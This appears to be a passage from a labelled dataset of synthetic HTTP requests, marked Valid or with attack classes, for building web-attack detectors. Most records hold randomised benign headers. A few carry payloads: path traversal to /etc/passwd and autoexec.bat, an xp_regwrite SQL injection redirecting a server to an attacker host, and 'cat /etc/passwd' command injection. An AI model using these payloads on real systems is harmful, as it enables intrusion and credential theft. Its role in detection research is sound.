Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: min-fresh=10
Client-ip: 118.110.105.174
Cookie: exfTcvf=h2<tere1dmha;0cg=otemda7ebeeami;mNueet=dQHL0;ckctttac= nO0body r(wg>iner;ee=325;brh2dtsnnmlnqdt=71550824
Cookie2: $Version="62"
Date: Tue, 30 Jan 07 04:37:13 GMT
ETag: W/"WzYc2l.lXp4XZd5i"
Expect: enii1Rn=icktpe
From: stnsist@ee8nh.de
If-Modified-Since: Wed, 23 Sep 09 20:55:15 CET
If-Unmodified-Since: Fri, 10 Sep 04 23:39:34 GMT
If-Match: "NzRSlOPN1@76ub@x"
If-None-Match: *
If-Range: *
Max-Forwards: 49
MIME-Version: 1.5
Pragma: du='rbr0dt3u'
Proxy-Authorization: Basic ZW9sVnRhdGU6Y05jeXllbg==
Authorization: Digest realm
Range: 8-7,-0713,855020-
Referer: http://www.6cieOnkv.be/snie7rm/omes8kE/elesr9e/teh93s3/eohyle.pdf
TE: trailers,chunked;q=0.3
Trailer: Authorization
User-Agent: Mozilla/8.8 (X11; U; Linux i386 2.8; mh-en; rv:0.3.1) Gecko/90232444
UA-CPU: 68000
UA-Disp: 3276,4561,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 212x4647
Via: 7.1 www.lenE3utb.htm
Transfer-Encoding: deflate
Upgrade: wrn/1.7, tal/7.3, xhsnbh/3.1, taut/3.1
Warning: 001 216.250.141.79 "mrtlI" "Wed, 07 Apr 10 04:48:16 CET"
X-Forwarded-For: 36.101.205.182
X-Serial-Number: 70412595449023727026
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20975
Start - Id: 23072
class: Valid
GET /a2vTketnhrnocvi61rTO/MsamIacceptCul6kgpPcI/4a4ud/8r1wgenersahlerktiI/KNBAsPsoEitmprMFq/2YO7Kj@_TqK/lMDQ@6o/lriyisn/p2@9/eGf9N/rolDZstsalFgdrf5.js? HTTP/1.0
Host: 197.53.197.108
Connection: close
Accept: audio/basic;q=0.2
Accept-Charset: euc-cn;q=0.4, x-mac-arabic, big5, ks_c_5601-1987
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: max-stale=4970
Client-ip: 171.30.150.131
Cookie: sgin1sddiiirn=Och1g
Cookie2: $Version="97"
Date: Fri, 11 Jul 08 08:46:38 UTC
ETag: W/"4EaK.gBzaKrlFCDof@"
Expect: 100-continue
From: lito@iAtsn.st
If-Modified-Since: Tue, 03 May 05 06:17:38 GMT
If-Unmodified-Since: Thu, 27 Apr 06 09:42:36 UTC
If-Match: *
If-None-Match: *
If-Range: "1GqyYMblblEKnq-kE"
Max-Forwards: 34
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic VHhlcmluOmV0bnJh
Authorization: 7oeAx uToEec=t66lmpr
Range: 038-288
Referer: http://e5iayary.uk/hoeHea/racisnl/utvm/meoa/arat9s.wav
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: nt8jINQ. http://www.lrof.it
UA-CPU: MIPS
UA-Disp: 5084,527,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8704x5020
Via: 2.7 www.ssa1.js
Transfer-Encoding: gzip
Upgrade: D8c/9.2, rfff9/6.0, ios/5.5
Warning: 077 www.iusll2d.htm "OizonXfehci" "Mon, 05 Jan 09 09:29:14 UTC"
X-Forwarded-For: 95.86.251.48
X-Serial-Number: 18684889581671575
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23072
Start - Id: 36313
class: PathTransversal
GET /2w/tgy5UietPrE/t4xVVA2mFftS/1ZsHBmo/atoh.jpg?SPieeij=sX-Zf.rpmh&u2lzI7@3DE=rn+edf%24&cteeansetNd=844871&a09iylpl=%2F%2C%2C%2C%2Fnsplos%2Fo3s%2Fpasswd&bsr=htpass&oe=R-htpyq%5Dnhttps&wtjwoW7t=psxdt+idrOetci&se=usBiga3alndtc7&smheriqpltmhc=01291&lahteRs=Sg+%2F3y%5CksKzry6n1&mdmspu6si=13311&xp_lwSUai.U=ityr%25hu%24&c0ywkksO4=07356926 HTTP/1.0
Host: www.no7ansj.cz:98
Connection: close
Accept: audio/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: oea=ag
Client-ip: 204.44.253.203
Cookie: etaAsstzE=ltwinntame;5ts0enTts=149831731;n5ooopO6ahs=2416;noe=oprocessing-instructiontwamochaaeK|oc/x;rht=hjeoemev
Cookie2: $Version="628"
Date: Thu, 29 Nov 07 05:10:05 GMT
ETag: "PR@C.gH8sSbya5og"
Expect: 100-continue
From: 5ygo@eiccrasaq.org
If-Modified-Since: Sat, 01 Oct 05 08:05:27 GMT
If-Unmodified-Since: Tue, 25 Sep 07 11:54:58 CET
If-Match: "Ftkxf1q3c9V.rL-7"
If-None-Match: *
If-Range: Sun, 21 Feb 10 20:02:53 UTC
Max-Forwards: 4677
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: tioya ejsnoe=rrNti
Authorization: Basic YXRmMWllOnNocnRmNG4=
Range: -3
Referer: /bxSiatn/SAdc/5pjodone/dxetere.jsp
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/3.4 (Machintosh; U; Mac OS X 7.6; lk-nd; rv:7.9.4) Gecko/37677135
UA-CPU: MIPS
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 645x5981
Via: HTTP/7.9 www.ht2r.html, 2.8 145.110.20.213:297
Transfer-Encoding: identity
Upgrade: saanei/2.6
Warning: 925 www.seESe.gif "aoh3bha8hrc" 
X-Forwarded-For: 87.172.119.89
X-Serial-Number: 10989646571343616
----: -------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36313
Start - Id: 20571
class: Valid
GET /l5vptsdOif/celtlene8Akthejgertw/tiyHxKH/ehKAaataod/emMDbinS.LIRwa/oanua3kqyt/2ssgPsy/k1FHXDj0Lbxtelnet0V/9ebtugitiaocahy/3X1szKform7171/iA2xLG1ltHW6lRp1cM.htm?dLa=9sztjvh&documentgZo=tmohe4&tmmeayabttaoP=jed&qJdQ4U6E0z0=tynthdLrtensntrynh HTTP/1.0
Host: 201.133.182.126
Connection: sgcgi
Accept: */*;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: abh=4ss
Client-ip: 108.141.166.90
Cookie: j2li3watmrevy=6807497;Er7ermsak=cti
Cookie2: $Version="407"
Date: Thu, 25 May 06 07:02:50 UTC
ETag: "6l06PnRQ7DMxrOPq21"
Expect: ruigm0oi=yotntt;wytfaT=Fef6e
From: po0uCr@azOlx3ayBy.org
If-Modified-Since: Wed, 07 Jun 06 05:59:40 UTC
If-Unmodified-Since: Sun, 17 May 09 08:26:27 CET
If-Match: "WVfD5XnkSYiBdMepF42"
If-None-Match: "dF9Wh@IlbRysIfZ7"
If-Range: Fri, 26 May 06 07:19:48 CET
Max-Forwards: 01
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic bjlrdW9lOmF0ZWc=
Authorization: Basic MXN1ZWh0OnJ4cmVl
Range: 852875-5353
Referer: /J7enu/asyndut.wmn
TE: deflate;q=0.2
Trailer: Host
User-Agent: Mozilla/2.5 (compatible; mhrimDiOzo; WinNT; slLr)
UA-CPU: StrongARM
UA-Disp: 9823,4223,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1074x5578
Via: HTTP/6.6 www.eepns.png, FTP/6.3 231.219.78.100, afen/5.8 www.0bnSa1h.js
Transfer-Encoding: compress
Upgrade: oenMr/2.7, dlt8/0.7, qsRuu/2.7, keAsp/4.8
Warning: 257 13.243.249.249 "3a9dtgni" 
X-Forwarded-For: 46.60.122.53
X-Serial-Number: 6248671751419598
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20571
Start - Id: 12652
class: Valid
GET /sCVpxD1REKH/erI0eea2LnYs/Ljgd/KfF2K7N_n/XYM.YdDf0WkblikeMj.swf? HTTP/1.0
Host: www.hsebzIreff.cz
Connection: fcoseS9
Accept: */*
Accept-Charset: iso-8859-2;q=0.1, windows-1253;q=0.9, x-mac-arabic;q=0.2, iso-8859-9
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-age=49246
Client-ip: 226.240.4.152
Cookie: edaI1Ohnrtise5a=28258;hu2Qtxw9rbni=i;184csaasorw5eu=STadminIcib;FMVkT2NjmNKz=e0shformeeelehsystemrL3e EHs
Cookie2: $Version="298"
Date: Mon, 21 Mar 05 02:30:18 GMT
ETag: "onFbsJ43WeEdwG0CQ"
Expect: 100-continue
From: e9hfirse@Sgst2t.uk
If-Modified-Since: Sun, 30 Nov 08 05:35:08 CET
If-Unmodified-Since: Mon, 11 Sep 06 08:22:24 UTC
If-Match: "ZbLwzpmYRpcvtVa"
If-None-Match: "aYnXxJVUZ1tZk4RV"
If-Range: Mon, 30 Aug 04 19:50:11 CET
Max-Forwards: 23
MIME-Version: 9.7
Pragma: rmWmn=h
Proxy-Authorization: NTLM czZpaW90N29vZE80aGlsd3RScElhRGZ2ZWlhM3M2Zk5kc0k4SWQ=
Authorization: Digest username="orttpmf"
Range: 929827-45
Referer: /ssqrh/5eItlgR8/lrbe/R3teNxa.pl
TE: trailers,gzip;q=0.5,trailers
Trailer: Range
User-Agent: Tinn (1r1Msb; iyjoTMW1H5)
UA-CPU: PowerPC
UA-Disp: 0856,221,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 961x7915
Via: HTTP/9.9 www.eilejiE.png, 0.6 198.240.57.61, FTP/8.7 208.244.153.227
Transfer-Encoding: compress
Upgrade: njK/4.3
Warning: 906 www.hkn2eu.gif "ileSeoToeetstiab" "Thu, 22 Jan 04 07:44:04 GMT"
X-Forwarded-For: 176.30.253.225
X-Serial-Number: 67342985693
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12652
Start - Id: 5650
class: Valid
PUT /qfusridDKQgstTVexec/uKb.FIjv9JH/13t.nsf? HTTP/1.0
Content-Length: 269
Content-Language: nertcfh0
Content-Encoding: compress
Content-Location: http://www.eTea.be/knel6p/duTnaeue/ebbix/aoi1l.bin
Content-MD5: Y2F0ZHRwc25lRXJtYWFrbw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 19 Mar 04 15:05:21 UTC
Last-Modified: Tue, 15 Jul 08 02:08:46 CET
Host: 114.4.176.49:80
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.7, iso-8859-5;q=0.6
Accept-Encoding: deflate;q=0.7, identity, gzip;q=0.2, identity;q=0.5, gzip
Accept-Language: *
Cache-Control: m=wuks5do
Client-ip: 169.217.120.61
Cookie: OdxqF=LOtak;peeT=93193;e4mH1oEtwrgctAp=482495;yj=rdapuj;seos=9uaggssa
Cookie2: $Version="544"
Date: Fri, 23 Jul 04 06:07:05 CET
ETag: "Iii7Dc8xdDY431QB"
Expect: 100-continue
From: ncfnnd3s@pjasfsran.gov
If-Modified-Since: Sat, 18 Nov 06 23:56:41 CET
If-Unmodified-Since: Tue, 15 Aug 06 05:48:10 CET
If-Match: "YHIh5JkkqZR.SLdV_"
If-None-Match: *
If-Range: *
Max-Forwards: 712
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM YTNiNG85bHJpc2VlZ0FtMDlBcnNsbld6dW9sZXRobmg5bA==
Authorization: NTLM dGVvaXFkZGwxdW5lZURzN2hpcjN0b2xueWlubmRsb2RoaHhsa3cyOWpsZA==
Range: 54-,73-799
Referer: /e2cisdh.rar
TE: trailers,gzip
Trailer: Expect
User-Agent: i7Ie8rz http://www.anhaf0.be
UA-CPU: StrongARM
UA-Disp: 1912,4963,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 129x5543
Via: HTTP/8.7 180.128.141.218, 1.3 107.196.15.32
Transfer-Encoding: mxarTs
Upgrade: nHtj/5.7, henx/4.4
Warning: 299 182.237.115.10 "ehssVhw" 
X-Forwarded-For: 93.141.115.142
X-Serial-Number: 59672
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

weossuasgnu3mip=da5Ibaaetw&sMusr@5=tc_BUk&iosnekeso=508&nciyihrtlosha=n3eqathe&dyherits=ge&UStLphg7Mx=7&iahua3ruy=AAaeetI&vr2r=36544&napuT9gt=4&afssrgfia96v=14908185&gihaeEf=tCAE&lan=45e]aEp+zcbu&tlwyuoNasno4kr6=dWct3.sZZw&34Hkphp5G7php-jo=dtaea1ntigitmpie&i1=1uSxt

End - Id: 5650
Start - Id: 107
class: Valid
GET /o5WsxtAwK/h3zsea.1rm19n/1FPRGEZFNVp.6QA2P/tvai9sb/sl8eothretn8gww/cftetxtenahzhiy.shtml?rma=myhfUL&dnsaO=sock_streamreplace%26+y&tiat=UDaI&eeentska4=n%3E%40&uhpnh=Ag6neerrwei&rysatyi2mndnsut=o6IJv&Tr=c4%24cs&cyna=nSt%27ss%5Cbt+easdstyleo5Kc&rdieeh8=1316&TSqshnjx=1ntlibe0almmoblikeslsrho&uA1o=p7IFqGl6E.KY&asv=9epassthrua%40te HTTP/1.1
Host: 162.206.177.231
Connection: tliisfsg
Accept: text/html, application/x-tar;q=0.6
Accept-Charset: windows-1252, iso-2022-kr;q=0.9
Accept-Encoding: *
Accept-Language: rl-Ler, iITi-el9thcwd;q=0.2
Cache-Control: max-age=339
Client-ip: 164.192.221.228
Cookie: gFfhsOyddzT=4otn;jdntAaldeesalnn=tupdatea;t7ahrFbPar=l70mVuxp
Cookie2: $Version="879"
Date: Fri, 31 Mar 06 03:40:23 CET
ETag: W/"UpN3.db1eMkvPra"
Expect: 100-continue
From: rnno@ee6menBpiS.be
If-Modified-Since: Sat, 30 May 09 04:50:38 UTC
If-Unmodified-Since: Sun, 09 May 04 11:44:25 UTC
If-Match: "jq1FJh9OnAQeb5yBmENn"
If-None-Match: *
If-Range: *
Max-Forwards: 683
MIME-Version: 0.8
Pragma: Eeurzyt='bek'
Proxy-Authorization: mEaE 9tettee=whEste0t
Authorization: Basic U253RWFhYzpleGFm
Range: -84012,-01335,-234
Referer: /svCia/snTeaEmC.wav
TE: gzip,trailers
Trailer: Pragma
User-Agent: Mozilla/5.6 (Windows; U; WinNT 3.8; io-ra; rv:4.3.8) Gecko/37657798
UA-CPU: MIPS
UA-Disp: 156,678,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5749x1102
Via: 1.8 110.90.146.50, 5.9 www.arieeaa.html, 1.3 190.166.20.42:93
Transfer-Encoding: ndnaoe; extTi=sfre0
Upgrade: gboEt/1.0, yTh/2.4, i8pth/2.0, grs/4.8, Gwwso/1.0
Warning: 072 208.33.148.233:391 "ceisHREdehQstgAa" "Wed, 04 Jul 07 07:49:02 GMT"
X-Forwarded-For: 51.68.213.133
X-Serial-Number: 9265848475
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 107
Start - Id: 36182
class: PathTransversal
GET /dSY6Ia/re9dceledwgedifdv/VtmpfW/fseebmtapszvnimjI/iileMdeoAreptt60/erervhenrfiatUeiTnN/lhgCvnrarna82de8e/MMOe98g/Tda/0U-orZuC.css?eEdyetnsx=i8INxMz4EYC0&QW_zin9KpRmCX=aC_2H.R&aWazenA=neanathvso7rqy2Er&shrduese8f=o%40pdyX3g-3&d5ewE=6&pfrPVaioXD1=%5Cautoexec.bat&anthc=e_ssgy.h&bbuihOnsuhhaoqr=e+oh%28erhome%3A+y6inataei HTTP/1.1
Host: www.yrmswtv.org
Connection: wd9N
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: ratr7-roaBtdsn, ar2zd3-iiden;q=0.1
Cache-Control: max-stale=0963
Client-ip: 164.124.198.233
Cookie: hJevtlhaott=70512055;eedr4EmO=o]ae$;2W1juoWXlocation7=2942
Cookie2: $Version="3"
Date: Fri, 06 May 05 18:33:57 GMT
ETag: "3ylimbTILOvC4rZIZ"
Expect: oss8oa
From: hseoct@sy2ts.fr
If-Modified-Since: Mon, 14 Nov 05 23:19:34 GMT
If-Match: "-M4HgsDwz.LEKgF"
If-None-Match: *
If-Range: *
Max-Forwards: 880
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM bHFrZW5keUxveWNlN2RiMXJvTGVudXNzM25ycXllbXJ1cGF0
Authorization: Digest cnonce="g1eaaho"
Referer: http://sdls.it/loed/bohtoeut/n9Pfee/paeol/enoeCi.nsf
TE: chunked;q=0.5,gzip;q=0.0
Trailer: Authorization
User-Agent: lnhori
UA-Disp: 094,1448,16
UA-OS: Win9x
UA-Pixels: 0116x5631
Via: HTTP/0.6 55.198.101.205, 4.9 201.107.203.119:48012, 8.0 181.15.127.218
Transfer-Encoding: identity
Upgrade: aehn/9.5
X-Forwarded-For: 143.21.25.63
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36182
Start - Id: 41018
class: SqlInjection
GET /es/t-/s6/emdr/0phG7y/3jmKP_selectaNM@wO/WsIJL5DLstdinh_Uxg/wDRi-w/aZOB/h3roal2ir.shtml?ese9nnNc2xe=OdefU3ls5nauS&air2ff=exec+++xp_regwrite+++++%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%27inyenet%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27&biohtmso=le%26wclrrttr HTTP/1.1
Host: 107.220.190.138
Connection: tioigp
Accept: video/*
Accept-Charset: iso-8859-3;q=0.5, koi8, gb2312;q=0.4, windows-1253;q=0.9, iso-2022-kr;q=0.3
Client-ip: 127.239.198.224
Date: Sat, 26 Sep 09 17:00:10 GMT
From: mjitt@yp3eteme.net
If-Unmodified-Since: Thu, 24 Sep 09 05:27:38 CET
If-None-Match: "Uk8sDQ-srg8eEW.tU"
MIME-Version: 5.6
Authorization: NTLM ZGgzeWk5RmU5ZW9saHV6Z250YW50dWF5aWtvb25BaHpuYU5uaWFub203YnBI
Referer: http://xiehhulg.cz/t7upPtr.gif
TE: chunked,deflate,chunked
User-Agent: Mozilla/1.7 (X11; U; Linux i586 4.5; ik-it; rv:9.5.5) Gecko/42811520
Upgrade: o5ors/4.1, ubrs/2.8
Warning: 660 www.ufege4r.shtml "gAywdtm" "Thu, 17 Jun 04 20:36:32 GMT"

null

End - Id: 41018
Start - Id: 25091
class: Valid
GET /nW7/5EA572dC_DahqlXaTkz_/C1iTkT.asp? HTTP/1.1
Host: www.quvee7od.biz:675
Connection: CeuNo
Accept: video/quicktime;q=0.1, video/mpeg
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: r1ujnyx-87g2iMt, ish8pi-iahntl, teLl8ot-onaa7li, o-w
Cache-Control: no-transform
Client-ip: 77.23.10.68
Cookie: iDetgcsDfawht=ttdcnceN;iivln=30e2weu8hlc;a9cp=m8t;eenjhiltrttHErc=15186
Cookie2: $Version="19"
Date: Sun, 22 Apr 07 01:30:40 CET
ETag: W/"9lAb5g8ILPiDHQc4"
Expect: 100-continue
From: hixb@siilehs.org
If-Modified-Since: Thu, 21 Dec 06 21:57:33 UTC
If-Unmodified-Since: Sun, 17 Apr 05 20:14:53 GMT
If-Match: *
If-None-Match: *
If-Range: "dkcHP-5DGkXrpOhe"
Max-Forwards: 6364
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Basic aWdycTA6YXRpYWFpbw==
Authorization: Digest response="b05fCEaD2af7fadCA3edb1D9CDEE1dF4"
Range: -382555,561-,08492-
Referer: /htlece.html
TE: trailers,gzip
Trailer: From
User-Agent: Mozilla/8.6 (compatible; MSIE 7.1; Mac OS X; ftawer2dn; nDnpEavca; i7ias)
UA-CPU: StrongARM
UA-Disp: 0466,0106,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 131x6281
Via: FTP/5.2 242.179.255.149, 9.1 2.167.189.222:396, 0.6 www.rntaer.shtml
Transfer-Encoding: identity
Upgrade: ece8ta/9.4, ieanW/9.7, nrhas/2.7, hela/0.5
Warning: 642 253.124.12.232 "tnzgoO" "Wed, 21 Apr 04 07:49:37 UTC"
X-Forwarded-For: 64.157.250.51
X-Serial-Number: 714579
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25091
Start - Id: 44548
class: OsCommanding
GET /handler;cat /etc/passwd| ? HTTP/1.1
Host: 7.119.188.34
Connection: 40ctti
Accept: audio/x-wav;q=0.3, audio/basic
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: sceefnia-nuaeiai;q=0.2, eev-Oa2I;q=0.4, ojere6f-lscusAGu;q=0.0, Nnsav-eoo
Cache-Control: max-stale
Client-ip: 15.83.253.70
Cookie: @1orsock_streamDobody=aresaIouruhx;ta=39551724;S8S3Ow0=6230764;eenitrkaoa=te;8vautoexecoSp=te@lvbscriptperl$ale
Cookie2: $Version="7"
Date: Mon, 17 Oct 05 04:30:02 GMT
ETag: W/"c5DougppZMb-TujuT3"
Expect: Iagtoa=j1emd
From: tzi1ete@elNpu.cz
If-Modified-Since: Mon, 28 Dec 09 23:50:38 UTC
If-Unmodified-Since: Sat, 01 Oct 05 24:33:49 GMT
If-Match: "JYZEs@uQtoT38q9rf11B"
If-None-Match: "Rac20ZHVWp9u2Qyv41F"
If-Range: Thu, 01 Feb 07 18:09:19 GMT
Max-Forwards: 5441
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Basic YXJucGF4bnM6Rm90aGl6
Authorization: Basic OWd0ZTpldGFvYQ==
Range: -06354,383-6635,26244-
Referer: /haPe.php3
TE: deflate;q=0.2
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.8 (compatible; nr9izr0; Open BSD i586; 6w5t; hhdnstu; oLa71t)
UA-Pixels: 8286x4573
Via: 6.0 www.rmHi6x.shtml:820, 2.0 52.249.176.251
Transfer-Encoding: deflate
Warning: 178 www.psrrz.gif:1 "5eiuelyVouirXa" 
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44548
Start - Id: 26827
class: Valid
GET /tsxmen/iWjEZrGCJiVi4lBI4Ls/pA..bOkqmjDmK-r1rkV5/xTMbq1W.gif? HTTP/1.0
Host: 169.169.234.242
Connection: keep-alive
Accept: application/postscript;q=0.5, audio/x-wav;q=0.2, video/*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: wlrtb='Eiwre'
Client-ip: 137.39.206.233
Cookie: dcQgV=hteAtu9aEfthoie;sm=holcoi'ec92se8
Cookie2: $Version="419"
Date: Sat, 27 Sep 08 09:44:41 GMT
ETag: "gbtpvYZTunud1Vk."
Expect: 100-continue
From: 4ahee@onawd.st
If-Modified-Since: Sat, 02 May 09 19:50:18 CET
If-Unmodified-Since: Fri, 20 Mar 09 08:48:25 UTC
If-Match: "T2W4NdqnMy7tG@BR"
If-None-Match: *
If-Range: *
Max-Forwards: 72
MIME-Version: 8.2
Pragma: Rc=ihrnc4
Proxy-Authorization: Digest realm
Authorization: nfner Ondstr=rainn
Range: -6214
Referer: /oea3iuci/gnoevi.asmx
TE: chunked;q=0.5,deflate
Trailer: Referer
User-Agent: Mozilla/1.8 (X11; U; Unix 0.3; an-mh; rv:1.7.0) Gecko/28304927
UA-CPU: StrongARM
UA-Disp: 5606,5500,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 9604x4951
Via: ltae/7.6 www.Lca9s.tiff
Transfer-Encoding: iiOss; 3oi9nDt=8cstii5
Upgrade: tniiag/4.7, oosdd/1.5, art/0.2, 1oioc/8.7, riu/1.5
Warning: 341 www.nnmq.png "nnserre1png8hew8e" 
X-Forwarded-For: 225.193.121.240
X-Serial-Number: 333154589
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26827
Start - Id: 7345
class: Valid
PUT /ei2.css? HTTP/1.1
Content-Length: 51
Content-Language: NkT1,c,aitn5o
Content-Encoding: identity
Content-Location: /8uniabsc/tebeos9/nbdajHaL/Jnloir/mytd.asmx
Content-MD5: bmE0bGxhZ3llbVZFZXRvcw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Jun 04 17:27:22 UTC
Last-Modified: Tue, 01 Jan 08 13:41:35 GMT
Host: 87.184.3.221:60815
Connection: keep-alive
Accept: text/xml, video/*;q=0.6, audio/basic;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 63.220.222.106
Cookie: fssvirhisTnl=jGHzA;tscelnajssl=~9de ;ov=278837;hoe1tedOiwgAj=t;8Ot=hn
Cookie2: $Version="61"
Date: Wed, 01 Feb 06 03:40:23 CET
ETag: W/"@UH25Vmn8F-oY63w"
Expect: 100-continue
From: paelsta@Bijzxj.uk
If-Modified-Since: Sun, 21 Sep 08 11:48:29 UTC
If-Unmodified-Since: Tue, 26 Jun 07 19:58:12 CET
If-Match: "is-bTRrM2SGaTLtgLsuS"
If-None-Match: *
If-Range: "Rbe3JyHfeNIAxGJ"
Max-Forwards: 4
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: r5it7 xtlcz=Plhl65g5
Authorization: NTLM ZWVhYmFjbXNkdGljcmNkbW5sbG9lbkVzc2xjMzZlcWVlZnRybG9N
Range: 41415-,015-50232,0-
Referer: /soni9a/iofh/v5aceX8i.msf
TE: chunked;q=0.6,gzip,trailers
Trailer: Transfer-Encoding
User-Agent: p8ude7hvtt1iPRoew
UA-CPU: x86
UA-Disp: 457,861,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 1302x7380
Via: HTTP/2.9 www.odtcuhi.gif, 5.3 243.230.200.217, HTTP/5.9 www.boYhSio.shtml
Transfer-Encoding: compress
Upgrade: 5a1o/5.9, umu/3.5
Warning: 639 www.vlpee.jpg "uAuatmodt" "Thu, 29 Sep 05 12:55:53 CET"
X-Forwarded-For: 181.117.178.72
X-Serial-Number: 33978029627174385263
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

QrwRj=qScsdntpekjo&slCtT=muca6em&sei1tj=999&l1=brxt

End - Id: 7345
Start - Id: 6175
class: Valid
PUT /rukA00XvCAV7o/er/iaelotr4Nh/3baOiu/e0cS01x@Gyo8e/zwmertrt6ooaozrcee/mEYebR3zPTd/d3Raemtldw1ew/w6NUzKfP@a2Qe0tY.jsp? HTTP/1.1
Content-Length: 317
Content-Language: diRne,gt,ianauc2
Content-Encoding: gzip
Content-Location: http://www.2telee.uk/8tn4a/ntyeemB/Meggdsae.exe
Content-MD5: bU5IMmlhT2dMYmhrTnVhUg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 23 Dec 05 18:41:03 GMT
Last-Modified: Wed, 31 May 06 15:15:29 GMT
Host: 0.174.1.62
Connection: close
Accept: text/*, application/*;q=0.1
Accept-Charset: iso-2022-jp;q=0.5, hz-gb-2312;q=0.9, windows-1257
Accept-Encoding: compress;q=0.6, identity;q=0.0
Accept-Language: aoe9-dS;q=0.1
Cache-Control: min-fresh=175
Client-ip: 118.127.32.11
Cookie: eeNatn=T%Na&e
Cookie2: $Version="6"
Date: Sat, 21 Feb 04 20:04:48 UTC
ETag: "XhHQV.zjMUB3F--7V"
Expect: 100-continue
From: ie7ofUi@efph.fr
If-Modified-Since: Wed, 05 Jul 06 05:30:43 GMT
If-Unmodified-Since: Fri, 18 Aug 06 24:12:57 UTC
If-Match: "n00erQduTDGrOo4_G"
If-None-Match: *
If-Range: Fri, 09 Sep 05 15:39:00 CET
Max-Forwards: 0
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic MUV6bGVxOlZhZmF5c3Ji
Authorization: Basic bmVhZTphbnJyYXRybA==
Range: -167,262-,74189-
Referer: /rueEa3L/vsEeeSr/wpmihe/aw3orTt.nsf
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/0.6 (compatible; MSIE 3.3; Open BSD i386; zsxOOnh; 4u89pet; webltTosRh)
UA-CPU: StrongARM
UA-Disp: 2552,3892,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3345x4822
Via: tens/0.8 211.115.95.23, FTP/6.2 www.kbGte.gif:4544
Transfer-Encoding: gzip
Upgrade: g3iin/5.9, tngec/6.1, yooln/3.5, teq/1.3
Warning: 029 www.mrtsha.jpg "Uoiemhw5aEjopHihf" "Mon, 22 May 06 11:12:43 GMT"
X-Forwarded-For: 147.71.226.116
X-Serial-Number: 113642708
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

insertT_execuuJ=36414739&neihniedqg=GT(xtermYstpositionaOd>dT&oeeEimebrhe=91&ydaliieoimotch=m;4Rt<eedocumente8i0or[httpr\g&iro6E1mrRtir=39&loztqzsl=48&emzs=hkmDRrthwasiito&1aagpldaVmrx=156280&dnph-YCL3wp-kY=05&8iaq=6668294&heeimu5iizr=299981090&rerlntfaesboOhs=ttke|e(zrb/i &IWXzgbdghtpass5Hsystem=R

End - Id: 6175
Start - Id: 36884
class: LdapInjection
